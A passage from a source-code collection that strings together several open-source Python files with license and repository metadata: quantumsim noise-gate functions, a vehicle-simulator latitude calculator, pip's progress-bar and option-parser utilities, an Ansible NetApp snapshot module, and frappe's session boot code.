generator[5][7] = 1j * np.arcsin(np.sqrt(leakage_mobility_rate)) * \
np.exp(1j * leakage_mobility_phase)
generator[7][5] = -1j * \
np.arcsin(np.sqrt(leakage_mobility_rate)) * \
np.exp(-1j * leakage_mobility_phase)
return generator
def cnot():
dcnot = np.zeros((9, 9))
dcnot[3, 3] = 0.5
dcnot[4, 4] = 0.5
dcnot[3, 4] = -0.5
dcnot[4, 3] = -0.5
unitary = expm(-1j * np.pi * dcnot)
return Operation.from_kraus(unitary, bases2_default)
def amp_damping(p0_up, p1_up, p1_down, p2_down):
"""
A gate, that excites or relaxes a qubit with a certain probability.
Parameters
----------
p0_up : float
Probability to excite to state 1, being in the state 0
p1_up : float
Probability to excite to state 2, being in the state 1
p1_down : float
Probability to relax to state 0, being in the state 1
p2_down : float
Probability to relax to state 1, being in the state 2
Returns
-------
quantumsim.operation._PTMOperation
"""
ptm = np.identity(9, dtype=float)
ptm[:3, :3] = [[1. - p0_up, p1_down, 0.],
[p0_up, 1. - p1_down - p1_up, p2_down],
[0., p1_up, 1 - p2_down]]
basis = (bases.general(3),)
return Operation.from_ptm(ptm, basis, basis)
def meas_butterfly(p0_up, p1_up, p1_down, p2_down):
"""
Returns a gate, that corresponds to measurement-induced excitations.
Each measurement should be sandwiched by two of these gates (before
and after projection. This operation dephases the qubit immediately.
Note: if measurement-induced leakage is reported by RB, p1_up should
be twice larger, since RB would report average probabllity for both 0
and 1 state.
Parameters
----------
p0_up : float
Probability to excite to state 1, being in the state 0
p1_up : float
Probability to excite to state 2, being in the state 1
p1_down : float
Probability to relax to state 0, being in the state 1
p2_down : float
Probability to relax to state 1, being in the state 2
Returns
-------
quantumsim.operation._PTMOperation
"""
basis = (bases.general(3).computational_subbasis(),)
return amp_damping(0.5*p0_up, 0.5*p1_up, 0.5*p1_down,
0.5*p2_down).set_bases(bases_in=basis, bases_out=basis)
| gpl-3.0 |
apiri/openxc-vehicle-simulator | data/lat_calc.py | 1 | 1310 | from .data_calc import DataCalc
from datetime import datetime
import math
class LatCalc(DataCalc):
def __init__(self):
self.initialize_data()
def initialize_data(self):
self.data = 42.095425
self.last_calc = datetime.now()
#self.earth_radius_km = 6378.1
self.earth_circumference_km = 40075.0
self.km_per_deg = self.earth_circumference_km / 360.0
self.name = 'latitude'
# Any necessary data should be passed in
def iterate(self, snapshot):
vehicle_speed = snapshot['vehicle_speed']
heading = snapshot['heading']
current_time = datetime.now()
time_delta = current_time - self.last_calc
self.last_calc = current_time
time_step = time_delta.seconds + (
float(time_delta.microseconds) / 1000000)
distance = time_step * (vehicle_speed / 3600)
N_S_dist = distance * math.cos(heading)
# old_lat = math.radians( self.data )
# new_lat = math.asin( math.sin(old_lat)*math.cos(distance/self.earth_radius_km) +
# math.cos(old_lat)*math.sin(distance/self.earth_radius_km)*math.cos(heading))
delta_lat = N_S_dist / self.km_per_deg
self.data = self.data + delta_lat
#Todo: check for the poles
| bsd-3-clause |
gitgitcode/myflask | venv/lib/python2.7/site-packages/pip/utils/ui.py | 490 | 11597 | from __future__ import absolute_import
from __future__ import division
import itertools
import sys
from signal import signal, SIGINT, default_int_handler
import time
import contextlib
import logging
from pip.compat import WINDOWS
from pip.utils import format_size
from pip.utils.logging import get_indentation
from pip._vendor import six
from pip._vendor.progress.bar import Bar, IncrementalBar
from pip._vendor.progress.helpers import (WritelnMixin,
HIDE_CURSOR, SHOW_CURSOR)
from pip._vendor.progress.spinner import Spinner
try:
from pip._vendor import colorama
# Lots of different errors can come from this, including SystemError and
# ImportError.
except Exception:
colorama = None
logger = logging.getLogger(__name__)
def _select_progress_class(preferred, fallback):
encoding = getattr(preferred.file, "encoding", None)
# If we don't know what encoding this file is in, then we'll just assume
# that it doesn't support unicode and use the ASCII bar.
if not encoding:
return fallback
# Collect all of the possible characters we want to use with the preferred
# bar.
characters = [
getattr(preferred, "empty_fill", six.text_type()),
getattr(preferred, "fill", six.text_type()),
]
characters += list(getattr(preferred, "phases", []))
# Try to decode the characters we're using for the bar using the encoding
# of the given file, if this works then we'll assume that we can use the
# fancier bar and if not we'll fall back to the plaintext bar.
try:
six.text_type().join(characters).encode(encoding)
except UnicodeEncodeError:
return fallback
else:
return preferred
_BaseBar = _select_progress_class(IncrementalBar, Bar)
class InterruptibleMixin(object):
"""
Helper to ensure that self.finish() gets called on keyboard interrupt.
This allows downloads to be interrupted without leaving temporary state
(like hidden cursors) behind.
This class is similar to the progress library's existing SigIntMixin
helper, but as of version 1.2, that helper has the following problems:
1. It calls sys.exit().
2. It discards the existing SIGINT handler completely.
3. It leaves its own handler in place even after an uninterrupted finish,
which will have unexpected delayed effects if the user triggers an
unrelated keyboard interrupt some time after a progress-displaying
download has already completed, for example.
"""
def __init__(self, *args, **kwargs):
"""
Save the original SIGINT handler for later.
"""
super(InterruptibleMixin, self).__init__(*args, **kwargs)
self.original_handler = signal(SIGINT, self.handle_sigint)
# If signal() returns None, the previous handler was not installed from
# Python, and we cannot restore it. This probably should not happen,
# but if it does, we must restore something sensible instead, at least.
# The least bad option should be Python's default SIGINT handler, which
# just raises KeyboardInterrupt.
if self.original_handler is None:
self.original_handler = default_int_handler
def finish(self):
"""
Restore the original SIGINT handler after finishing.
This should happen regardless of whether the progress display finishes
normally, or gets interrupted.
"""
super(InterruptibleMixin, self).finish()
signal(SIGINT, self.original_handler)
def handle_sigint(self, signum, frame):
"""
Call self.finish() before delegating to the original SIGINT handler.
This handler should only be in place while the progress display is
active.
"""
self.finish()
self.original_handler(signum, frame)
class DownloadProgressMixin(object):
def __init__(self, *args, **kwargs):
super(DownloadProgressMixin, self).__init__(*args, **kwargs)
self.message = (" " * (get_indentation() + 2)) + self.message
@property
def downloaded(self):
return format_size(self.index)
@property
def download_speed(self):
# Avoid zero division errors...
if self.avg == 0.0:
return "..."
return format_size(1 / self.avg) + "/s"
@property
def pretty_eta(self):
if self.eta:
return "eta %s" % self.eta_td
return ""
def iter(self, it, n=1):
for x in it:
yield x
self.next(n)
self.finish()
class WindowsMixin(object):
def __init__(self, *args, **kwargs):
# The Windows terminal does not support the hide/show cursor ANSI codes
# even with colorama. So we'll ensure that hide_cursor is False on
# Windows.
# This call neds to go before the super() call, so that hide_cursor
# is set in time. The base progress bar class writes the "hide cursor"
# code to the terminal in its init, so if we don't set this soon
# enough, we get a "hide" with no corresponding "show"...
if WINDOWS and self.hide_cursor:
self.hide_cursor = False
super(WindowsMixin, self).__init__(*args, **kwargs)
# Check if we are running on Windows and we have the colorama module,
# if we do then wrap our file with it.
if WINDOWS and colorama:
self.file = colorama.AnsiToWin32(self.file)
# The progress code expects to be able to call self.file.isatty()
# but the colorama.AnsiToWin32() object doesn't have that, so we'll
# add it.
self.file.isatty = lambda: self.file.wrapped.isatty()
# The progress code expects to be able to call self.file.flush()
# but the colorama.AnsiToWin32() object doesn't have that, so we'll
# add it.
self.file.flush = lambda: self.file.wrapped.flush()
class DownloadProgressBar(WindowsMixin, InterruptibleMixin,
DownloadProgressMixin, _BaseBar):
file = sys.stdout
message = "%(percent)d%%"
suffix = "%(downloaded)s %(download_speed)s %(pretty_eta)s"
class DownloadProgressSpinner(WindowsMixin, InterruptibleMixin,
DownloadProgressMixin, WritelnMixin, Spinner):
file = sys.stdout
suffix = "%(downloaded)s %(download_speed)s"
def next_phase(self):
if not hasattr(self, "_phaser"):
self._phaser = itertools.cycle(self.phases)
return next(self._phaser)
def update(self):
message = self.message % self
phase = self.next_phase()
suffix = self.suffix % self
line = ''.join([
message,
" " if message else "",
phase,
" " if suffix else "",
suffix,
])
self.writeln(line)
################################################################
# Generic "something is happening" spinners
#
# We don't even try using progress.spinner.Spinner here because it's actually
# simpler to reimplement from scratch than to coerce their code into doing
# what we need.
################################################################
@contextlib.contextmanager
def hidden_cursor(file):
# The Windows terminal does not support the hide/show cursor ANSI codes,
# even via colorama. So don't even try.
if WINDOWS:
yield
# We don't want to clutter the output with control characters if we're
# writing to a file, or if the user is running with --quiet.
# See https://github.com/pypa/pip/issues/3418
elif not file.isatty() or logger.getEffectiveLevel() > logging.INFO:
yield
else:
file.write(HIDE_CURSOR)
try:
yield
finally:
file.write(SHOW_CURSOR)
class RateLimiter(object):
def __init__(self, min_update_interval_seconds):
self._min_update_interval_seconds = min_update_interval_seconds
self._last_update = 0
def ready(self):
now = time.time()
delta = now - self._last_update
return delta >= self._min_update_interval_seconds
def reset(self):
self._last_update = time.time()
class InteractiveSpinner(object):
def __init__(self, message, file=None, spin_chars="-\\|/",
# Empirically, 8 updates/second looks nice
min_update_interval_seconds=0.125):
self._message = message
if file is None:
file = sys.stdout
self._file = file
self._rate_limiter = RateLimiter(min_update_interval_seconds)
self._finished = False
self._spin_cycle = itertools.cycle(spin_chars)
self._file.write(" " * get_indentation() + self._message + " ... ")
self._width = 0
def _write(self, status):
assert not self._finished
# Erase what we wrote before by backspacing to the beginning, writing
# spaces to overwrite the old text, and then backspacing again
backup = "\b" * self._width
self._file.write(backup + " " * self._width + backup)
# Now we have a blank slate to add our status
self._file.write(status)
self._width = len(status)
self._file.flush()
self._rate_limiter.reset()
def spin(self):
if self._finished:
return
if not self._rate_limiter.ready():
return
self._write(next(self._spin_cycle))
def finish(self, final_status):
if self._finished:
return
self._write(final_status)
self._file.write("\n")
self._file.flush()
self._finished = True
# Used for dumb terminals, non-interactive installs (no tty), etc.
# We still print updates occasionally (once every 60 seconds by default) to
# act as a keep-alive for systems like Travis-CI that take lack-of-output as
# an indication that a task has frozen.
class NonInteractiveSpinner(object):
def __init__(self, message, min_update_interval_seconds=60):
self._message = message
self._finished = False
self._rate_limiter = RateLimiter(min_update_interval_seconds)
self._update("started")
def _update(self, status):
assert not self._finished
self._rate_limiter.reset()
logger.info("%s: %s", self._message, status)
def spin(self):
if self._finished:
return
if not self._rate_limiter.ready():
return
self._update("still running...")
def finish(self, final_status):
if self._finished:
return
self._update("finished with status '%s'" % (final_status,))
self._finished = True
@contextlib.contextmanager
def open_spinner(message):
# Interactive spinner goes directly to sys.stdout rather than being routed
# through the logging system, but it acts like it has level INFO,
# i.e. it's only displayed if we're at level INFO or better.
# Non-interactive spinner goes through the logging system, so it is always
# in sync with logging configuration.
if sys.stdout.isatty() and logger.getEffectiveLevel() <= logging.INFO:
spinner = InteractiveSpinner(message)
else:
spinner = NonInteractiveSpinner(message)
try:
with hidden_cursor(sys.stdout):
yield spinner
except KeyboardInterrupt:
spinner.finish("canceled")
raise
except Exception:
spinner.finish("error")
raise
else:
spinner.finish("done")
| mit |
anryko/ansible | lib/ansible/modules/storage/netapp/na_elementsw_snapshot.py | 52 | 13120 | #!/usr/bin/python
# (c) 2018, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or
# https://www.gnu.org/licenses/gpl-3.0.txt)
'''
Element OS Software Snapshot Manager
'''
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = '''
module: na_elementsw_snapshot
short_description: NetApp Element Software Manage Snapshots
extends_documentation_fragment:
- netapp.solidfire
version_added: '2.7'
author: NetApp Ansible Team (@carchi8py) <ng-ansibleteam@netapp.com>
description:
- Create, Modify or Delete Snapshot on Element OS Cluster.
options:
name:
description:
- Name of new snapshot create.
- If unspecified, date and time when the snapshot was taken is used.
state:
description:
- Whether the specified snapshot should exist or not.
choices: ['present', 'absent']
default: 'present'
src_volume_id:
description:
- ID or Name of active volume.
required: true
account_id:
description:
- Account ID or Name of Parent/Source Volume.
required: true
retention:
description:
- Retention period for the snapshot.
- Format is 'HH:mm:ss'.
src_snapshot_id:
description:
- ID or Name of an existing snapshot.
- Required when C(state=present), to modify snapshot properties.
- Required when C(state=present), to create snapshot from another snapshot in the volume.
- Required when C(state=absent), to delete snapshot.
enable_remote_replication:
description:
- Flag, whether to replicate the snapshot created to a remote replication cluster.
- To enable specify 'true' value.
type: bool
snap_mirror_label:
description:
- Label used by SnapMirror software to specify snapshot retention policy on SnapMirror endpoint.
expiration_time:
description:
- The date and time (format ISO 8601 date string) at which this snapshot will expire.
password:
description:
- Element OS access account password
aliases:
- pass
username:
description:
- Element OS access account user-name
aliases:
- user
'''
EXAMPLES = """
- name: Create snapshot
tags:
- elementsw_create_snapshot
na_elementsw_snapshot:
hostname: "{{ elementsw_hostname }}"
username: "{{ elementsw_username }}"
password: "{{ elementsw_password }}"
state: present
src_volume_id: 118
account_id: sagarsh
name: newsnapshot-1
- name: Modify Snapshot
tags:
- elementsw_modify_snapshot
na_elementsw_snapshot:
hostname: "{{ elementsw_hostname }}"
username: "{{ elementsw_username }}"
password: "{{ elementsw_password }}"
state: present
src_volume_id: sagarshansivolume
src_snapshot_id: test1
account_id: sagarsh
expiration_time: '2018-06-16T12:24:56Z'
enable_remote_replication: false
- name: Delete Snapshot
tags:
- elementsw_delete_snapshot
na_elementsw_snapshot:
hostname: "{{ elementsw_hostname }}"
username: "{{ elementsw_username }}"
password: "{{ elementsw_password }}"
state: absent
src_snapshot_id: deltest1
account_id: sagarsh
src_volume_id: sagarshansivolume
"""
RETURN = """
msg:
description: Success message
returned: success
type: str
"""
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
import ansible.module_utils.netapp as netapp_utils
from ansible.module_utils.netapp_elementsw_module import NaElementSWModule
HAS_SF_SDK = netapp_utils.has_sf_sdk()
class ElementOSSnapshot(object):
"""
Element OS Snapshot Manager
"""
def __init__(self):
self.argument_spec = netapp_utils.ontap_sf_host_argument_spec()
self.argument_spec.update(dict(
state=dict(required=False, choices=['present', 'absent'], default='present'),
account_id=dict(required=True, type='str'),
name=dict(required=False, type='str'),
src_volume_id=dict(required=True, type='str'),
retention=dict(required=False, type='str'),
src_snapshot_id=dict(required=False, type='str'),
enable_remote_replication=dict(required=False, type='bool'),
expiration_time=dict(required=False, type='str'),
snap_mirror_label=dict(required=False, type='str')
))
self.module = AnsibleModule(
argument_spec=self.argument_spec,
supports_check_mode=True
)
input_params = self.module.params
self.state = input_params['state']
self.name = input_params['name']
self.account_id = input_params['account_id']
self.src_volume_id = input_params['src_volume_id']
self.src_snapshot_id = input_params['src_snapshot_id']
self.retention = input_params['retention']
self.properties_provided = False
self.expiration_time = input_params['expiration_time']
if input_params['expiration_time'] is not None:
self.properties_provided = True
self.enable_remote_replication = input_params['enable_remote_replication']
if input_params['enable_remote_replication'] is not None:
self.properties_provided = True
self.snap_mirror_label = input_params['snap_mirror_label']
if input_params['snap_mirror_label'] is not None:
self.properties_provided = True
if self.state == 'absent' and self.src_snapshot_id is None:
self.module.fail_json(
msg="Please provide required parameter : snapshot_id")
if HAS_SF_SDK is False:
self.module.fail_json(
msg="Unable to import the SolidFire Python SDK")
else:
self.sfe = netapp_utils.create_sf_connection(module=self.module)
self.elementsw_helper = NaElementSWModule(self.sfe)
# add telemetry attributes
self.attributes = self.elementsw_helper.set_element_attributes(source='na_elementsw_snapshot')
def get_account_id(self):
"""
Return account id if found
"""
try:
# Update and return self.account_id
self.account_id = self.elementsw_helper.account_exists(self.account_id)
return self.account_id
except Exception as err:
self.module.fail_json(msg="Error: account_id %s does not exist" % self.account_id, exception=to_native(err))
def get_src_volume_id(self):
"""
Return volume id if found
"""
src_vol_id = self.elementsw_helper.volume_exists(self.src_volume_id, self.account_id)
if src_vol_id is not None:
# Update and return self.volume_id
self.src_volume_id = src_vol_id
# Return src_volume_id
return self.src_volume_id
return None
def get_snapshot(self, name=None):
"""
Return snapshot details if found
"""
src_snapshot = None
if name is not None:
src_snapshot = self.elementsw_helper.get_snapshot(name, self.src_volume_id)
elif self.src_snapshot_id is not None:
src_snapshot = self.elementsw_helper.get_snapshot(self.src_snapshot_id, self.src_volume_id)
if src_snapshot is not None:
# Update self.src_snapshot_id
self.src_snapshot_id = src_snapshot.snapshot_id
# Return src_snapshot
return src_snapshot
def create_snapshot(self):
"""
Create Snapshot
"""
try:
self.sfe.create_snapshot(volume_id=self.src_volume_id,
snapshot_id=self.src_snapshot_id,
name=self.name,
enable_remote_replication=self.enable_remote_replication,
retention=self.retention,
snap_mirror_label=self.snap_mirror_label,
attributes=self.attributes)
except Exception as exception_object:
self.module.fail_json(
msg='Error creating snapshot %s' % (
to_native(exception_object)),
exception=traceback.format_exc())
def modify_snapshot(self):
"""
Modify Snapshot Properties
"""
try:
self.sfe.modify_snapshot(snapshot_id=self.src_snapshot_id,
expiration_time=self.expiration_time,
enable_remote_replication=self.enable_remote_replication,
snap_mirror_label=self.snap_mirror_label)
except Exception as exception_object:
self.module.fail_json(
msg='Error modify snapshot %s' % (
to_native(exception_object)),
exception=traceback.format_exc())
def delete_snapshot(self):
"""
Delete Snapshot
"""
try:
self.sfe.delete_snapshot(snapshot_id=self.src_snapshot_id)
except Exception as exception_object:
self.module.fail_json(
msg='Error delete snapshot %s' % (
to_native(exception_object)),
exception=traceback.format_exc())
def apply(self):
"""
Check, process and initiate snapshot operation
"""
changed = False
snapshot_delete = False
snapshot_create = False
snapshot_modify = False
result_message = None
self.get_account_id()
# Dont proceed if source volume is not found
if self.get_src_volume_id() is None:
self.module.fail_json(msg="Volume id not found %s" % self.src_volume_id)
# Get snapshot details using source volume
snapshot_detail = self.get_snapshot()
if snapshot_detail:
if self.properties_provided:
if self.expiration_time != snapshot_detail.expiration_time:
changed = True
else: # To preserve value in case parameter expiration_time is not defined/provided.
self.expiration_time = snapshot_detail.expiration_time
if self.enable_remote_replication != snapshot_detail.enable_remote_replication:
changed = True
else: # To preserve value in case parameter enable_remote_Replication is not defined/provided.
self.enable_remote_replication = snapshot_detail.enable_remote_replication
if self.snap_mirror_label != snapshot_detail.snap_mirror_label:
changed = True
else: # To preserve value in case parameter snap_mirror_label is not defined/provided.
self.snap_mirror_label = snapshot_detail.snap_mirror_label
if self.account_id is None or self.src_volume_id is None or self.module.check_mode:
changed = False
result_message = "Check mode, skipping changes"
elif self.state == 'absent' and snapshot_detail is not None:
self.delete_snapshot()
changed = True
elif self.state == 'present' and snapshot_detail is not None:
if changed:
self.modify_snapshot() # Modify Snapshot properties
elif not self.properties_provided:
if self.name is not None:
snapshot = self.get_snapshot(self.name)
# If snapshot with name already exists return without performing any action
if snapshot is None:
self.create_snapshot() # Create Snapshot using parent src_snapshot_id
changed = True
else:
self.create_snapshot()
changed = True
elif self.state == 'present':
if self.name is not None:
snapshot = self.get_snapshot(self.name)
# If snapshot with name already exists return without performing any action
if snapshot is None:
self.create_snapshot() # Create Snapshot using parent src_snapshot_id
changed = True
else:
self.create_snapshot()
changed = True
else:
changed = False
result_message = "No changes requested, skipping changes"
self.module.exit_json(changed=changed, msg=result_message)
def main():
"""
Main function
"""
na_elementsw_snapshot = ElementOSSnapshot()
na_elementsw_snapshot.apply()
if __name__ == '__main__':
main()
| gpl-3.0 |
geo-poland/frappe | frappe/boot.py | 31 | 4702 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
"""
bootstrap client session
"""
import frappe
import frappe.defaults
import frappe.widgets.page
from frappe.utils import get_gravatar
def get_bootinfo():
"""build and return boot info"""
frappe.set_user_lang(frappe.session.user)
bootinfo = frappe._dict()
hooks = frappe.get_hooks()
doclist = []
# user
get_user(bootinfo)
# system info
bootinfo['sysdefaults'] = frappe.defaults.get_defaults()
bootinfo['server_date'] = frappe.utils.nowdate()
if frappe.session['user'] != 'Guest':
bootinfo['user_info'] = get_fullnames()
bootinfo['sid'] = frappe.session['sid'];
# home page
bootinfo.modules = {}
for app in frappe.get_installed_apps():
try:
bootinfo.modules.update(frappe.get_attr(app + ".config.desktop.get_data")() or {})
except ImportError:
pass
except AttributeError:
pass
bootinfo.module_app = frappe.local.module_app
bootinfo.hidden_modules = frappe.db.get_global("hidden_modules")
bootinfo.doctype_icons = dict(frappe.db.sql("""select name, icon from
tabDocType where ifnull(icon,'')!=''"""))
bootinfo.doctype_icons.update(dict(frappe.db.sql("""select name, icon from
tabPage where ifnull(icon,'')!=''""")))
add_home_page(bootinfo, doclist)
add_allowed_pages(bootinfo)
load_translations(bootinfo)
add_timezone_info(bootinfo)
load_conf_settings(bootinfo)
load_print(bootinfo, doclist)
# ipinfo
if frappe.session['data'].get('ipinfo'):
bootinfo['ipinfo'] = frappe.session['data']['ipinfo']
# add docs
bootinfo['docs'] = doclist
for method in hooks.boot_session or []:
frappe.get_attr(method)(bootinfo)
if bootinfo.lang:
bootinfo.lang = unicode(bootinfo.lang)
bootinfo.error_report_email = frappe.get_hooks("error_report_email")
return bootinfo
def load_conf_settings(bootinfo):
from frappe import conf
for key in ['developer_mode']:
if key in conf: bootinfo[key] = conf.get(key)
def add_allowed_pages(bootinfo):
roles = frappe.get_roles()
bootinfo.page_info = {}
for p in frappe.db.sql("""select distinct
tabPage.name, tabPage.modified, tabPage.title
from `tabPage Role`, `tabPage`
where `tabPage Role`.role in (%s)
and `tabPage Role`.parent = `tabPage`.name""" % ', '.join(['%s']*len(roles)),
roles, as_dict=True):
bootinfo.page_info[p.name] = {"modified":p.modified, "title":p.title}
# pages where role is not set are also allowed
for p in frappe.db.sql("""select name, modified, title
from `tabPage` where
(select count(*) from `tabPage Role`
where `tabPage Role`.parent=tabPage.name) = 0""", as_dict=1):
bootinfo.page_info[p.name] = {"modified":p.modified, "title":p.title}
def load_translations(bootinfo):
if frappe.local.lang != 'en':
bootinfo["__messages"] = frappe.get_lang_dict("boot")
bootinfo["lang"] = frappe.lang
def get_fullnames():
"""map of user fullnames"""
ret = frappe.db.sql("""select name,
concat(ifnull(first_name, ''),
if(ifnull(last_name, '')!='', ' ', ''), ifnull(last_name, '')) as fullname,
user_image as image, gender, email
from tabUser where ifnull(enabled, 0)=1""", as_dict=1)
d = {}
for r in ret:
if not r.image:
r.image = get_gravatar()
d[r.name] = r
return d
def get_startup_js():
startup_js = []
for method in frappe.get_hooks().startup_js or []:
startup_js.append(frappe.get_attr(method)() or "")
return "\n".join(startup_js)
def get_user(bootinfo):
"""get user info"""
bootinfo.user = frappe.user.load_user()
def add_home_page(bootinfo, docs):
"""load home page"""
if frappe.session.user=="Guest":
return
home_page = frappe.db.get_default("desktop:home_page")
try:
page = frappe.widgets.page.get(home_page)
except (frappe.DoesNotExistError, frappe.PermissionError):
frappe.message_log.pop()
page = frappe.widgets.page.get('desktop')
bootinfo['home_page'] = page.name
docs.append(page)
def add_timezone_info(bootinfo):
user = bootinfo.user.get("time_zone")
system = bootinfo.sysdefaults.get("time_zone")
if user and user != system:
import frappe.utils.momentjs
bootinfo.timezone_info = {"zones":{}, "rules":{}, "links":{}}
frappe.utils.momentjs.update(user, bootinfo.timezone_info)
frappe.utils.momentjs.update(system, bootinfo.timezone_info)
def load_print(bootinfo, doclist):
print_settings = frappe.db.get_singles_dict("Print Settings")
print_settings.doctype = ":Print Settings"
doclist.append(print_settings)
load_print_css(bootinfo, print_settings)
def load_print_css(bootinfo, print_settings):
bootinfo.print_css = frappe.get_attr("frappe.templates.pages.print.get_print_style")(print_settings.print_style or "Modern")
| mit |
opendatakosovo/vitia-workshop-viz | venv/lib/python2.7/site-packages/pip/baseparser.py | 78 | 12035 | """Base option parser setup"""
import sys
import optparse
import pkg_resources
import os
import textwrap
from distutils.util import strtobool
from pip.backwardcompat import ConfigParser, string_types
from pip.locations import default_config_file, default_log_file
from pip.util import get_terminal_size, get_prog
class PrettyHelpFormatter(optparse.IndentedHelpFormatter):
"""A prettier/less verbose help formatter for optparse."""
def __init__(self, *args, **kwargs):
# help position must be aligned with __init__.parseopts.description
kwargs['max_help_position'] = 30
kwargs['indent_increment'] = 1
kwargs['width'] = get_terminal_size()[0] - 2
optparse.IndentedHelpFormatter.__init__(self, *args, **kwargs)
def format_option_strings(self, option):
return self._format_option_strings(option, ' <%s>', ', ')
def _format_option_strings(self, option, mvarfmt=' <%s>', optsep=', '):
"""
Return a comma-separated list of option strings and metavars.
:param option: tuple of (short opt, long opt), e.g: ('-f', '--format')
:param mvarfmt: metavar format string - evaluated as mvarfmt % metavar
:param optsep: separator
"""
opts = []
if option._short_opts:
opts.append(option._short_opts[0])
if option._long_opts:
opts.append(option._long_opts[0])
if len(opts) > 1:
opts.insert(1, optsep)
if option.takes_value():
metavar = option.metavar or option.dest.lower()
opts.append(mvarfmt % metavar.lower())
return ''.join(opts)
def format_heading(self, heading):
if heading == 'Options':
return ''
return heading + ':\n'
def format_usage(self, usage):
"""
Ensure there is only one newline between usage and the first heading
if there is no description.
"""
msg = '\nUsage: %s\n' % self.indent_lines(textwrap.dedent(usage), " ")
return msg
def format_description(self, description):
# leave full control over description to us
if description:
if hasattr(self.parser, 'main'):
label = 'Commands'
else:
label = 'Description'
#some doc strings have inital newlines, some don't
description = description.lstrip('\n')
#some doc strings have final newlines and spaces, some don't
description = description.rstrip()
#dedent, then reindent
description = self.indent_lines(textwrap.dedent(description), " ")
description = '%s:\n%s\n' % (label, description)
return description
else:
return ''
def format_epilog(self, epilog):
# leave full control over epilog to us
if epilog:
return epilog
else:
return ''
def indent_lines(self, text, indent):
new_lines = [indent + line for line in text.split('\n')]
return "\n".join(new_lines)
class UpdatingDefaultsHelpFormatter(PrettyHelpFormatter):
"""Custom help formatter for use in ConfigOptionParser that updates
the defaults before expanding them, allowing them to show up correctly
in the help listing"""
def expand_default(self, option):
if self.parser is not None:
self.parser.update_defaults(self.parser.defaults)
return optparse.IndentedHelpFormatter.expand_default(self, option)
class CustomOptionParser(optparse.OptionParser):
def insert_option_group(self, idx, *args, **kwargs):
"""Insert an OptionGroup at a given position."""
group = self.add_option_group(*args, **kwargs)
self.option_groups.pop()
self.option_groups.insert(idx, group)
return group
@property
def option_list_all(self):
"""Get a list of all options, including those in option groups."""
res = self.option_list[:]
for i in self.option_groups:
res.extend(i.option_list)
return res
class ConfigOptionParser(CustomOptionParser):
"""Custom option parser which updates its defaults by by checking the
configuration files and environmental variables"""
def __init__(self, *args, **kwargs):
self.config = ConfigParser.RawConfigParser()
self.name = kwargs.pop('name')
self.files = self.get_config_files()
self.config.read(self.files)
assert self.name
optparse.OptionParser.__init__(self, *args, **kwargs)
def get_config_files(self):
config_file = os.environ.get('PIP_CONFIG_FILE', False)
if config_file and os.path.exists(config_file):
return [config_file]
return [default_config_file]
def update_defaults(self, defaults):
"""Updates the given defaults with values from the config files and
the environ. Does a little special handling for certain types of
options (lists)."""
# Then go and look for the other sources of configuration:
config = {}
# 1. config files
for section in ('global', self.name):
config.update(self.normalize_keys(self.get_config_section(section)))
# 2. environmental variables
config.update(self.normalize_keys(self.get_environ_vars()))
# Then set the options with those values
for key, val in config.items():
option = self.get_option(key)
if option is not None:
# ignore empty values
if not val:
continue
# handle multiline configs
if option.action == 'append':
val = val.split()
else:
option.nargs = 1
if option.action in ('store_true', 'store_false', 'count'):
val = strtobool(val)
try:
val = option.convert_value(key, val)
except optparse.OptionValueError:
e = sys.exc_info()[1]
print("An error occurred during configuration: %s" % e)
sys.exit(3)
defaults[option.dest] = val
return defaults
def normalize_keys(self, items):
"""Return a config dictionary with normalized keys regardless of
whether the keys were specified in environment variables or in config
files"""
normalized = {}
for key, val in items:
key = key.replace('_', '-')
if not key.startswith('--'):
key = '--%s' % key # only prefer long opts
normalized[key] = val
return normalized
def get_config_section(self, name):
"""Get a section of a configuration"""
if self.config.has_section(name):
return self.config.items(name)
return []
def get_environ_vars(self, prefix='PIP_'):
"""Returns a generator with all environmental vars with prefix PIP_"""
for key, val in os.environ.items():
if key.startswith(prefix):
yield (key.replace(prefix, '').lower(), val)
def get_default_values(self):
"""Overridding to make updating the defaults after instantiation of
the option parser possible, update_defaults() does the dirty work."""
if not self.process_default_values:
# Old, pre-Optik 1.5 behaviour.
return optparse.Values(self.defaults)
defaults = self.update_defaults(self.defaults.copy()) # ours
for option in self._get_all_options():
default = defaults.get(option.dest)
if isinstance(default, string_types):
opt_str = option.get_opt_string()
defaults[option.dest] = option.check_value(opt_str, default)
return optparse.Values(defaults)
def error(self, msg):
self.print_usage(sys.stderr)
self.exit(2, "%s\n" % msg)
try:
pip_dist = pkg_resources.get_distribution('pip')
version = '%s from %s (python %s)' % (
pip_dist, pip_dist.location, sys.version[:3])
except pkg_resources.DistributionNotFound:
# when running pip.py without installing
version = None
def create_main_parser():
parser_kw = {
'usage': '\n%prog <command> [options]',
'add_help_option': False,
'formatter': UpdatingDefaultsHelpFormatter(),
'name': 'global',
'prog': get_prog(),
}
parser = ConfigOptionParser(**parser_kw)
genopt = optparse.OptionGroup(parser, 'General Options')
parser.disable_interspersed_args()
# having a default version action just causes trouble
parser.version = version
for opt in standard_options:
genopt.add_option(opt)
parser.add_option_group(genopt)
return parser
standard_options = [
optparse.make_option(
'-h', '--help',
dest='help',
action='help',
help='Show help.'),
optparse.make_option(
# Run only if inside a virtualenv, bail if not.
'--require-virtualenv', '--require-venv',
dest='require_venv',
action='store_true',
default=False,
help=optparse.SUPPRESS_HELP),
optparse.make_option(
'-v', '--verbose',
dest='verbose',
action='count',
default=0,
help='Give more output. Option is additive, and can be used up to 3 times.'),
optparse.make_option(
'-V', '--version',
dest='version',
action='store_true',
help='Show version and exit.'),
optparse.make_option(
'-q', '--quiet',
dest='quiet',
action='count',
default=0,
help='Give less output.'),
optparse.make_option(
'--log',
dest='log',
metavar='file',
help='Log file where a complete (maximum verbosity) record will be kept.'),
optparse.make_option(
# Writes the log levels explicitely to the log'
'--log-explicit-levels',
dest='log_explicit_levels',
action='store_true',
default=False,
help=optparse.SUPPRESS_HELP),
optparse.make_option(
# The default log file
'--local-log', '--log-file',
dest='log_file',
metavar='file',
default=default_log_file,
help=optparse.SUPPRESS_HELP),
optparse.make_option(
# Don't ask for input
'--no-input',
dest='no_input',
action='store_true',
default=False,
